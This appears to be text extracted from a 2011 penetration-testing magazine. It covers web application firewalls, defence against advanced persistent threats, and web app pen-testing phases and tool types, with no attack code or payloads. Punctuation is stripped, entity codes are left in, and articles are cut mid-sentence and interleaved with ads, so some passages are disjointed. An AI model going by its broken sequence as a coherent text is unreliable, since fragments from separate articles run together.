Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
